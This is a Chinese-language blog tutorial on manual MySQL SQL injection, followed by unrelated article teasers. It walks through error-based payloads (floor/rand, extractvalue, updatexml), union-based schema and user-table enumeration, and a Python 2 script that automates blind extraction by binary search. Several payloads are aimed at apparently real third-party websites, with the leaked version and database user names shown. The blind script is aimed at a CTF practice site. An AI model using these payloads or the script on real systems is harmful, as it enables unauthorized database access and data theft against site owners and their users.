niexinming
niexinming

mysql注入漏洞手注

mysql:
报错注入:
以http://www.hexie.com/main/articleDetail.php?id=757
为例子:
http://www.hexie.com/main/articleDetail.php?id=757'
报错
方法一:(1)http://www.hexie.com/main/articleDetail.php
?id=757' and (select 1 from (select count(*),concat( version(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) #':Duplicate entry '5.5.201' for key 'group_key'
(2)替换掉加红加粗的version之后,我们可以查到更多的东西
www.hexie.com/main/articleDetail.php?id=757' and (select 1 from (select count(*),concat( (select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat((select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) #':Duplicate entry 'phmisdbuser1' for key 'group_key'
方法二:
(1)www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, version())) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
(2)www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, (select User from mysql.user limit 1,1))) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,((select User from mysql.user limit 1,1)))) #':XPATH syntax error: '\phmisdbuser'
方法三:
(1)www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select version()),0x5e24),1)) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select version()),0x5e24),1)) #':XPATH syntax error: '^$5.5.20^$'
(2)www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select User from mysql.user limit 1,1),0x5e24),1)) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select User from mysql.user limit 1,1),0x5e24),1)) #':XPATH syntax error: '^$phmisdbuser^$'


【1】mysql常见的查询信息的语句
【2】user():当前用户信息
【3】select database() :当前数据库
【4】SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1:查询所有数据库
【5】一个一个遍历查询所有表:select table_name from information_schema.tables where table_schema='数据库名' limit 1,1
【6】一个一个遍历查询一个表的字段:select COLUMN_NAME from Information_schema.columns where table_Name = '表名' and TABLE_SCHEMA='数据库名' limit 1,1
【7】一个一个遍历数据:select 字段名 from 数据库名.表名 limit 1,1(Ps:一次只能遍历一个字段的一个数据)
【8】查询host 信息:select Host from mysql.user limit 1,1

union 注入:
举例子:http://www.hunyinshe.com/list.php?id=1
【1】首先,推测出这个表里面有多少字段:
http://www.hunyinshe.com/list.php?id=1 order by 1 – (返回正常页面)
http://www.hunyinshe.com/list.php?id=1 order by 2 –
(返回正常页面)
………………
http://www.hunyinshe.com/list.php?id=1 order by 32 –
(返回正常页面)
http://www.hunyinshe.com/list.php?id=1 order by 32–
(返回不正常页面)
这样推断出这个表里面有32个字段
【2】猜当前数据库名字:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 --
【3】猜所有数据库:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.SCHEMATA --
【4】猜所有的表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables --
【5】查数据库名为:mysql的所有表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x6d7973716c--
(Ps:其中 0x6d7973716c是”mysql”的HEX编码)
【6】查数据库名为:xjdj的所有表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x786a646a--
【7】查数据库为xjdj的cmsdj_user的字段名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from Information_schema.columns where table_Name = 0x636d73646a5f75736572 and TABLE_SCHEMA=0x786a646a--
【8】查数据库为xjdj的cmsdj_user的字段名cd_name的数据:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,字段名,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from 数据库名.表名 limit 1,100 --

(Ps:前100条数据)


盲注:

我们以
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=f&action=login
为例子
【1】爆数据库的版本:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))>0) #&pass=f&action=login
显示用户名错误
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))<0) #&pass=f&action=login
显示数据库连接失败

我写了一个小程序来加快速度 



# -*- coding: gbk -*-
import urllib2
import urllib

sqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"

data = {
        "admin":"admin' and (ascii(substring(version(),1,1))=0) #",
        "pass":"f",
        "action":"login"}
def getlength():
    for counti in range(1000):
        data["admin"]="admin' and length(%s)=%s #&pass=f&action=login" % (sqlcomm,str(counti))
        urldata=urllib.urlencode(data)
        url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
        headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
        req = urllib2.Request(url,headers=headers)
        resul=urllib2.urlopen(req).read()
        resulstr=resul.decode('gbk')
        if resulstr.find(u'数据库连接失败')==-1:            #查找中文
            print counti
            return counti
    return False

def sendhttp(countn,sign,num):
    data["admin"]="admin' and (ascii(substring(%s,%s,1))%s%s) #" % (sqlcomm,str(countn),sign,str(middle))
    urldata=urllib.urlencode(data)
    url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
    req = urllib2.Request(url,headers=headers)
    resul=urllib2.urlopen(req).read()
    resulstr=resul.decode('gbk')
    if resulstr.find(u'数据库连接失败')==-1:
        return True
    return False


coutnum= getlength()
for j in range(1,coutnum+1):
    min,max=0,140
    while min<=max:
        middle=(max+min)//2
        if sendhttp(j,"=",middle):
            print chr(middle),
            break
        if sendhttp(j,">",middle):
            min=middle+1
        else:
            max=middle-1

大家只要把红色的sqlcomm的这个变量就行修改就可以得到想要的数据
Ps:科普一些mysql函数的用法
substring(str,start,length):截取字符串,str是要截取的字串,start 是从哪个地方截取,length是截取的长度
ascii(str):把字符转换成ascii码,str是要转换的字符
length(str):获取字符串的长度,要获取的字串

常用的东西查询语句有见文章上面:mysql常见的查询信息的语句

你可能感兴趣的:(漏洞,mysql,数据库,安全)

  • uniapp-首页模块 Brilliant Nemo uniappuni-appjavascript前端
    小兔鲜儿-首页模块涉及知识点:组件通信、组件自动导入、数据渲染、触底分页加载、下拉刷新等。自定义导航栏参考效果:自定义导航栏的样式需要适配不同的机型。:::tip操作步骤准备组件静态结构修改页面配置,隐藏默认导航栏,修改文字颜色样式适配->安全区域:::静态结构新建业务组件:src/pages/index/componets/CustomNavbar.vue<scriptsetuplang
  • Mac 安装 PrettyZoo 指南 黄豪宙
    Mac安装PrettyZoo指南ZK客户端mac安装PrettyZoo项目地址:https://gitcode.com/Resource-Bundle-Collection/b5cf2概述PrettyZoo是一款免费开源的Zookeeper客户端工具,支持Mac、Linux和Windows平台。本指南主要介绍如何在Mac平台上安装PrettyZoo,并解决安装过程中可能遇到的安全策略问题。环境描述
  • 从0-1学习Mysql第七章: 分区与分库分表 一小路一 掌握Go语言:编程世界的进阶钥匙学习mysql数据库后端面试
    第七章:分区与分库分表在大数据时代,单个数据库或表往往难以应对海量数据带来的存储、查询和维护压力。分区、分表和分库分表技术正是在这种背景下应运而生。它们通过将数据进行逻辑或物理拆分,实现数据管理的灵活性和系统性能的优化。1.分区表的概念与使用场景1.1什么是分区表?分区表是将一个大表按照某种规则(如范围、列表、哈希等)划分为多个逻辑子表的技术。虽然物理上数据仍存储在同一张表内,但查询时数据库可以根
  • 令牌技术 JWT令牌 圈圈编码 数据库
    1.令牌(Token)令牌(Token)是计算机安全领域中的一种凭证机制,用于验证用户身份或授权访问资源。它通常是一个字符串,携带了用户身份、权限或其他关键信息,服务端可通过验证令牌的合法性来判断请求的合法性。常见令牌类型:会话令牌(SessionToken):传统Web应用中,服务器生成一个唯一ID存储在服务端(如内存或数据库),客户端通过Cookie或URL参数携带该ID。访问令牌(Acces
  • SQL注入(一)—— sql手动注入实操 逆熵SEC. sql网络web安全
    SQLSQL注入sql注入的核心SQL手注的一般流程判断注入点——第一步判断字段数——第二步判断回显点——第三步查询相关内容——第四步判断库名判断表名判断列名查询具体信息总结SQL注入SQL注入攻击是目前web应用网络攻击中最常见的手段之一,曾被冠以“漏洞之王”的称号,其安全风险高于缓冲区溢出漏洞等所有其他漏洞,而市场上的防火墙又不能对SQL注入漏洞进行有效的检测和防范。SQL注入攻击普遍存在范围
  • 文件泄露类安全漏洞技术分享 - Java为例 码农老起 安全java
    引言文件泄露漏洞指的是应用程序未能妥善保护敏感文件,导致这些文件被未经授权的用户访问或下载。文件泄露是一种常见的安全漏洞,可能导致严重的数据泄露、经济损失和声誉损害。本文将以Java应用为例,分析文件泄露漏洞的成因、影响,并提出相应的技术解决方案。文件泄露漏洞解释文件泄露通常发生在以下几种情况中:1.缺乏适当的访问控制:应用程序没有针对文件的访问进行严格的权限控制,导致敏感文件可以被未经授权的用户
  • 提高数据安全性:Java 中的混合加密算法应用 码农老起 安全加密算法网络开发语言算法
    目录一、混合加密算法概述二、混合加密算法的优缺点三、Java实现混合加密算法在现代信息安全领域,加密算法扮演着至关重要的角色。为了提升加密效率并确保数据的安全性,混合加密算法成为了一种常见的加密技术。本文将介绍混合加密算法的概念,并通过Java示例展示其实现方法。一、混合加密算法概述混合加密算法结合了对称加密和非对称加密的优点。它利用非对称加密算法(如RSA)来加密对称加密算法(如AES)的密钥,
  • 今天写一篇新手向,如何快速写出SpringMVC架构 小巫程序Demo日记 Spring深层了解架构springbootjava
    小巫程序Demo日记:如何快速掌握MVC架构思想一、MVC是什么?在学习SpringMVC之前,我们首先需要弄明白MVC是什么。MVC是一种设计模式,全称是Model-View-Controller(模型-视图-控制器),它将应用程序分成三个主要部分,彼此分工明确:Model(模型)作用:负责管理数据和业务逻辑。职责:存储数据(比如数据库中的用户信息)、处理数据的规则(比如验证输入是否合法)、以及
  • MySQL赋予用户权限命令总结 雪下的那么认真 数据库
    ySQL用户可用权限一个新建的MySQL用户没有任何访问权限,这就意味着你不能在MySQL数据库中进行任何操作。你得赋予用户必要的权限。以下是一些可用的权限:ALL:所有可用的权限CREATE:创建库、表和索引LOCK_TABLES:锁定表ALTER:修改表DELETE:删除表INSERT:插入表或列SELECT:检索表或列的数据CREATE_VIEW:创建视图SHOW_DATABASES:列出数
  • 用 AI 解决心理健康匹配难题:探索 NLP 在心理咨询领域的应用
    AI在心理健康行业的机遇与挑战心理健康行业近年来增长迅速,但仍然面临诸多技术挑战:•精准匹配:如何利用AI/NLP理解用户情绪、需求、心理状态,匹配合适的心理咨询师?•数据隐私:如何在AI分析过程中保障用户数据安全,避免敏感信息泄露?•智能化vs.人性化:如何平衡算法推荐与人工咨询的个性化,避免AI过度干预?这些问题,正是我们当前研究和探索的方向!研究方向:如何用AI进行智能匹配?我们正在研究如何
  • 【YashanDB 知识库】启动数据库时报错 数据库
    问题现象在部署数据库时,或直接用yasdb启动数据库时报错:YAS-02059controlfileversion0.2.64isincompatiblewithYashanDBversion0.2.65原因数据库的文件(如:controlfile)的版本与数据库实例要求的版本不兼容,通常数据库要求的文件格式更新了,而controlfile还是旧的格式,所以不兼容。解决的办法先检查当前环境变量YA
  • 企业 AI 之痛:使用DeepSeek 碰壁,Folib 制品库 “救场” deepseek
    概述在科技飞速发展的当下,以DeepSeek为代表的开源大模型为企业的智能化转型带来了无限可能,然而,其在应用过程中所暴露出的诸多问题,如网络安全隐患、数据与模型管理难题以及协作效率低下等,也让企业在拥抱新技术时面临着严峻挑战。博云牧品Folib制品库的出现,犹如一场及时雨,精准地解决了企业在使用开源大模型时的痛点。它不仅实现了Ollama私有化仓库部署,确保数据不出域,满足金融级合规要求,更在数
  • 如果我有100w想存进银行,什么样的存储方式才是收益最大化的 I-NullMoneyException 程序人生程序员创富
    根据2025年最新的银行利率环境和市场趋势,100万元存款实现收益最大化的策略需结合安全性、流动性、利率水平和市场动态综合设计。以下是具体建议:一、选择高息存款产品与银行优先考虑中小银行的大额存单国有银行三年期大额存单利率约为3.8%(100万年利息38,000元),而地方性小银行(如农村信用社、城商行)的同期限大额存单利率可达4.26%以上(年利息42,600元)。部分小银行为吸引大额资金,可能
  • WordPress Course Booking System SQL注入漏洞复现 (CVE-2025-22785)(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:课程预订系统是一个在线平台,旨在简化课程报名流程。用户可以通过系统浏览可用课程,查看详细的课程描述、时间安排和讲师信息,并通过简单的
  • 用 CodeGen 告别重复开发:自动化生成数据库访问层代码 go自动化代码生成
    简介codegenhttps://github.com/xyzbit/codegen是一个专注于提高开发效率的代码生成工具集合。目前主要包含了数据库访问层(Repository)代码生成功能,未来可能会扩展更多功能模块如:API接口代码生成,API错误码生成,APISDK生成。核心功能:数据库仓储层代码生成(dbrepo)在传统Web开发中,我们常常陷入以下重复劳动:模型层代码手工编写:每张数据库
  • GO单元测试&集成测试的 mock 方案 gomock单元测试集成测试
    GO单元测试&集成测试的mock方案在单元测试或集成测试中,不希望依赖原始数据库或者说给原始数据库带去脏数据,我们往往使用Mock的方式进行模拟,当然单元测试和集成测试中的侧重点同,下面会介绍基于数据打桩、启动模拟数据库等解决方案。我们通过下面这个案例来说明几种mock方式的优劣势和适用场景案例:需要mock下面这个数据库操作接口TestRepo//TestEntity测试用实体typeTestE
  • 【数据库】 MongoDB 查看当前用户的角色和权限 颜淡慕潇 数据库系列sql数据库mongodbnosql
    在MongoDB中,可以通过一些简单的命令查看当前用户的角色和权限。这对于理解用户的访问能力和管理用户权限至关重要。1.使用MongoDBShell查看角色和权限1.1查看当前数据库用户要查看当前数据库中的所有用户及其角色,可以使用以下命令:usedb.getUsers()这将返回包含所有用户及其角色的数组。例如:[{"user"
  • 游戏工作室如何选择IP方案?动态与静态的实战对比 http
    对于游戏工作室来说,IP管理直接关系到运营效率和账号安全。很多团队在动态IP和静态IP之间摇摆不定——前者价格低但问题多,后者成本高却更稳定。今天我们从实际使用场景出发,聊聊这两种方案的真实体验。一、先搞懂基础概念动态IP就像共享单车,每次联网都会更换地址。这种模式适合临时测试新游戏,比如快速注册少量账号验证规则。但当你需要持续挂机做任务时,凌晨三点突然断线重连换IP,可能导致角色卡在副本里掉装备
  • web安全——分析应用程序 PT_silver web安全理论web安全安全
    文章目录一、确定用户输入入口点二、确定服务端技术三、解析受攻击面一、确定用户输入入口点在检查枚举应用程序功能时生成的HTTP请求的过程中,用户输入入口点包括:URL文件路径通常,在查询字符?之前的URL部分并不视为用户输入入口,但在REST风格的URL中,查询字符之前的URL部分实际上可作为数据参数。例如:http://eis/shop/browse/electronics/iphone其中的el
  • 基于springboot的在线小说阅读平台设计与实现-计算机毕业设计源码+LW文档 qq_375279829 计算机毕业设计程序源码javaspringbootjava数据库
    开发语言:Java框架:springbootJDK版本:JDK1.8服务器:tomcat7数据库:mysql5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:Maven3.3.9浏览器:谷歌浏览器数据库代码:DROPTABLEIFEXISTS`discussxiaoshuoxinxi`;/*!40101SET@saved_c
  • Sui 通过 SCION 推进网络安全与性能 Sui_Network Sui科普文章web安全安全游戏人工智能大数据dreamweaver去中心化
    Sui正在整合SCION,以增强网络安全性、可靠性和性能。SCION的下一代互联网架构将改善Sui验证节点之间的通信,减少BGP劫持等漏洞,并确保操作不中断,为Sui的基础设施提供更具弹性的基础。SCION(即下一代网络的可扩展性、控制和隔离)是一种从零开始开发的互联网架构,旨在提供路由控制、故障隔离和明确的信任信息,以支持端到端的通信。与传统的互联网协议不同,SCION提供了路径感知网络,允许实
  • 车载诊断数据库 --- AUTOSAR诊断文件DEXT简介 车载诊断技术 车载电子电气架构数据库汽车软件架构双核心车载诊断数据库AUTOSAR诊断文件DEXT
    我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师:简单,单纯,喜欢独处,独来独往,不易合同频过着接地气的生活,除了生存温饱问题之外,没有什么过多的欲望,表面看起来很高冷,内心热情,如果你身边有这样灵性的人,一定要好好珍惜他们眼中有神有光,干净,给人感觉很舒服,有超强的感知能力有形的无形的感知力很强,能感知人的内心变化喜欢独处,好静,
  • Python网络安全脚本 网络安全Ash pythonweb安全开发语言
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快前言睡不着,那就起来学习其实base64模块很早之前用过今天做爬虫的时候有个URL需要用它来编码一下所以百度又学了一下遇到最大的问题就是python3和python2区别问题python3的这个不支持直接上字符串纠结了好久。base64编码Base64是网络上最常见的用于传输8Bit字节代码的编码方式之一,大家可以查看RFC2045~RF
  • GaussDB(for openGauss):基于 GaussDB 迁移、智能管理构建应用解决方案_opengaussdb主从数据库之间的同步策略 2401_85794553 gaussdb数据库
    文章目录前言一、数据库生态与技术发展1.1、云数据库市场的高速增长1.2、华为云Stack+GaussDB1.3、华为云打造GaussDB全场景云服务二、何为GaussDB(foropenGauss)?2.1、GaussDB应用场景2.2、GaussDB核心优势2.3、GaussDB分布式核心架构三、GaussDB提供金融级高可用3.1、GaussDB实现全场景容灾3.2、跨AZ/Region容灾
  • 202年充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 202年充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 仿12306项目(1) 容器( ु⁎ᴗ_ᴗ⁎)ु.。oO java
    雪花算法为了高效的生成有序且唯一的ID,可以采用雪花算法来进行实现,为什么不去采用UUID呢?首先,UUID是一个128位的值,相较于雪花算法生成的64位的值,长了很多,在数据库中存储时耗费的时间更长,UUID生成后没有顺序关系,导致它不适合做主键,雪花算法排序具有可读性,在一些状况下更容易地追踪。雪花算法的原理IdUtil.getSnowflake有两个参数,第一个时数据中心的编号,第二个时机器
  • mongodb【实用教程】 朝阳39 #数据库mongodb数据库
    MongoDB是一个开源的文档型数据库管理系统下载安装Windows系统https://blog.csdn.net/weixin_41192489/article/details/126777309GUI工具【推荐】MongoDBCompasshttps://www.mongodb.com/zh-cn/docs/compass/current/Robo3Thttps://blog.csdn.net
  • 202年充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 【DeepSeek如何提升渗透测试的效率及防范安全漏铜,从0-1详细教】 生活De°咸鱼 安全专栏AIGC大数据web安全安全性测试AI编程
    利用DeepSeek提升渗透测试效率信息收集与资产测绘自动化目标扫描:利用DeepSeek的联网搜索模式(RAG技术),在命令行输入目标网址或相关关键词,获取目标公开信息,如子域名、开放端口、历史漏洞记录等,生成资产拓扑图。例如:输入指令:获取example.com的子域名、开放端口及历史漏洞记录。也可上传目标系统的配置文件、日志或代码库,通过DeepSeek-R1模型分析潜在暴露面,如API密钥
  • Enum 枚举 120153216 enum枚举
    原文地址:http://www.cnblogs.com/Kavlez/p/4268601.html Enumeration 于Java 1.5增加的enum type...enum type是由一组固定的常量组成的类型,比如四个季节、扑克花色。在出现enum type之前,通常用一组int常量表示枚举类型。比如这样: public static final int APPLE_FUJI = 0
  • Java8简明教程 bijian1013 javajdk1.8
            Java 8已于2014年3月18日正式发布了,新版本带来了诸多改进,包括Lambda表达式、Streams、日期时间API等等。本文就带你领略Java 8的全新特性。  一.允许在接口中有默认方法实现         Java 8 允许我们使用default关键字,为接口声明添
  • Oracle表维护 快速备份删除数据 cuisuqiang oracle索引快速备份删除
    我知道oracle表分区,不过那是数据库设计阶段的事情,目前是远水解不了近渴。 当前的数据库表,要求保留一个月数据,且表存在大量录入更新,不存在程序删除。 为了解决频繁查询和更新的瓶颈,我在oracle内根据需要创建了索引。但是随着数据量的增加,一个半月数据就要超千万,此时就算有索引,对高并发的查询和更新来说,让然有所拖累。 为了解决这个问题,我一般一个月会进行一次数据库维护,主要工作就是备
  • java多态内存分析 麦田的设计者 java内存分析多态原理接口和抽象类
          “  时针如果可以回头,熟悉那张脸,重温嬉戏这乐园,墙壁的松脱涂鸦已经褪色才明白存在的价值归于记忆。街角小店尚存在吗?这大时代会不会牵挂,过去现在花开怎么会等待。       但有种意外不管痛不痛都有伤害,光阴远远离开,那笑声徘徊与脑海。但这一秒可笑不再可爱,当天心
  • Xshell实现Windows上传文件到Linux主机 被触发 windows
    经常有这样的需求,我们在Windows下载的软件包,如何上传到远程Linux主机上?还有如何从Linux主机下载软件包到Windows下;之前我的做法现在看来好笨好繁琐,不过也达到了目的,笨人有本方法嘛; 我是怎么操作的: 1、打开一台本地Linux虚拟机,使用mount 挂载Windows的共享文件夹到Linux上,然后拷贝数据到Linux虚拟机里面;(经常第一步都不顺利,无法挂载Windo
  • 类的加载ClassLoader 肆无忌惮_ ClassLoader
    类加载器ClassLoader是用来将java的类加载到虚拟机中,类加载器负责读取class字节文件到内存中,并将它转为Class的对象(类对象),通过此实例的 newInstance()方法就可以创建出该类的一个对象。   其中重要的方法为findClass(String name)。   如何写一个自己的类加载器呢? 首先写一个便于测试的类Student
  • html5写的玫瑰花 知了ing html5
    <html> <head> <title>I Love You!</title> <meta charset="utf-8" /> </head> <body> <canvas id="c"></canvas>
  • google的ConcurrentLinkedHashmap源代码解析 矮蛋蛋 LRU
    原文地址: http://janeky.iteye.com/blog/1534352 简述 ConcurrentLinkedHashMap 是google团队提供的一个容器。它有什么用呢?其实它本身是对 ConcurrentHashMap的封装,可以用来实现一个基于LRU策略的缓存。详细介绍可以参见 http://code.google.com/p/concurrentlinke
  • webservice获取访问服务的ip地址 alleni123 webservice
    1. 首先注入javax.xml.ws.WebServiceContext, @Resource private WebServiceContext context; 2. 在方法中获取交换请求的对象。 javax.xml.ws.handler.MessageContext mc=context.getMessageContext(); com.sun.net.http
  • 菜鸟的java基础提升之道——————>是否值得拥有 百合不是茶
    1,c++,java是面向对象编程的语言,将万事万物都看成是对象;java做一件事情关注的是人物,java是c++继承过来的,java没有直接更改地址的权限但是可以通过引用来传值操作地址,java也没有c++中繁琐的操作,java以其优越的可移植型,平台的安全型,高效性赢得了广泛的认同,全世界越来越多的人去学习java,我也是其中的一员      java组成:
  • 通过修改Linux服务自动启动指定应用程序 bijian1013 linux
    Linux中修改系统服务的命令是chkconfig (check config),命令的详细解释如下: chkconfig 功能说明:检查,设置系统的各种服务。 语  法:chkconfig [ -- add][ -- del][ -- list][系统服务] 或 chkconfig [ -- level  <</SPAN>
  • spring拦截器的一个简单实例 bijian1013 javaspring拦截器Interceptor
    Purview接口 package aop; public interface Purview { void checkLogin(); } Purview接口的实现类PurviesImpl.java package aop; public class PurviewImpl implements Purview { public void check
  • [Velocity二]自定义Velocity指令 bit1129 velocity
    什么是Velocity指令 在Velocity中,#set,#if, #foreach, #elseif, #parse等,以#开头的称之为指令,Velocity内置的这些指令可以用来做赋值,条件判断,循环控制等脚本语言必备的逻辑控制等语句,Velocity的指令是可扩展的,即用户可以根据实际的需要自定义Velocity指令   自定义指令(Directive)的一般步骤 &nbs
  • 【Hive十】Programming Hive学习笔记 bit1129 programming
    第二章 Getting Started 1.Hive最大的局限性是什么?一是不支持行级别的增删改(insert, delete, update)二是查询性能非常差(基于Hadoop MapReduce),不适合延迟小的交互式任务三是不支持事务2. Hive MetaStore是干什么的?Hive persists table schemas and other system metadata.
  • nginx有选择性进行限制 ronin47 nginx 动静 限制
    http { limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=5r/s;... server {... location ~.*\.(gif|png|css|js|icon)$ {
  • java-4.-在二元树中找出和为某一值的所有路径 . bylijinnan java
    /* * 0.use a TwoWayLinkedList to store the path.when the node can't be path,you should/can delete it. * 1.curSum==exceptedSum:if the lastNode is TreeNode,printPath();delete the node otherwise
  • Netty学习笔记 bylijinnan javanetty
    本文是阅读以下两篇文章时: http://seeallhearall.blogspot.com/2012/05/netty-tutorial-part-1-introduction-to.html http://seeallhearall.blogspot.com/2012/06/netty-tutorial-part-15-on-channel.html 我的一些笔记 ===
  • js获取项目路径 cngolon js
    //js获取项目根路径,如: http://localhost:8083/uimcardprj function getRootPath(){     //获取当前网址,如: http://localhost:8083/uimcardprj/share/meun.jsp     var curWwwPath=window.document.locati
  • oracle 的性能优化 cuishikuan oracleSQL Server
       在网上搜索了一些Oracle性能优化的文章,为了更加深层次的巩固[边写边记],也为了可以随时查看,所以发表这篇文章。     1.ORACLE采用自下而上的顺序解析WHERE子句,根据这个原理,表之间的连接必须写在其他WHERE条件之前,那些可以过滤掉最大数量记录的条件必须写在WHERE子句的末尾。(这点本人曾经做过实例验证过,的确如此哦!
  • Shell变量和数组使用详解 daizj linuxshell变量数组
    Shell 变量 定义变量时,变量名不加美元符号($,PHP语言中变量需要),如: your_name="w3cschool.cc" 注意,变量名和等号之间不能有空格,这可能和你熟悉的所有编程语言都不一样。同时,变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z)。 中间不能有空格,可以使用下划线(_)。 不能使用标点符号。 不能使用ba
  • 编程中的一些概念,KISS、DRY、MVC、OOP、REST dcj3sjt126com REST
    KISS、DRY、MVC、OOP、REST (1)KISS是指Keep It Simple,Stupid(摘自wikipedia),指设计时要坚持简约原则,避免不必要的复杂化。 (2)DRY是指Don't Repeat Yourself(摘自wikipedia),特指在程序设计以及计算中避免重复代码,因为这样会降低灵活性、简洁性,并且可能导致代码之间的矛盾。 (3)OOP 即Object-Orie
  • [Android]设置Activity为全屏显示的两种方法 dcj3sjt126com Activity
    1. 方法1:AndroidManifest.xml 里,Activity的 android:theme  指定为" @android:style/Theme.NoTitleBar.Fullscreen" 示例:   <application      
  • solrcloud 部署方式比较 eksliang solrCloud
    solrcloud 的部署其实有两种方式可选,那么我们在实践开发中应该怎样选择呢? 第一种:当启动solr服务器时,内嵌的启动一个Zookeeper服务器,然后将这些内嵌的Zookeeper服务器组成一个集群。  第二种:将Zookeeper服务器独立的配置一个集群,然后将solr交给Zookeeper进行管理   谈谈第一种:每启动一个solr服务器就内嵌的启动一个Zoo
  • Java synchronized关键字详解 gqdy365 synchronized
    转载自:http://www.cnblogs.com/mengdd/archive/2013/02/16/2913806.html 多线程的同步机制对资源进行加锁,使得在同一个时间,只有一个线程可以进行操作,同步用以解决多个线程同时访问时可能出现的问题。 同步机制可以使用synchronized关键字实现。 当synchronized关键字修饰一个方法的时候,该方法叫做同步方法。 当s
  • js实现登录时记住用户名 hw1287789687 记住我记住密码cookie记住用户名记住账号
    在页面中如何获取cookie值呢? 如果是JSP的话,可以通过servlet的对象request 获取cookie,可以 参考:http://hw1287789687.iteye.com/blog/2050040 如果要求登录页面是html呢?html页面中如何获取cookie呢? 直接上代码了 页面:loginInput.html 代码: <!DOCTYPE html PUB
  • 开发者必备的 Chrome 扩展 justjavac chrome
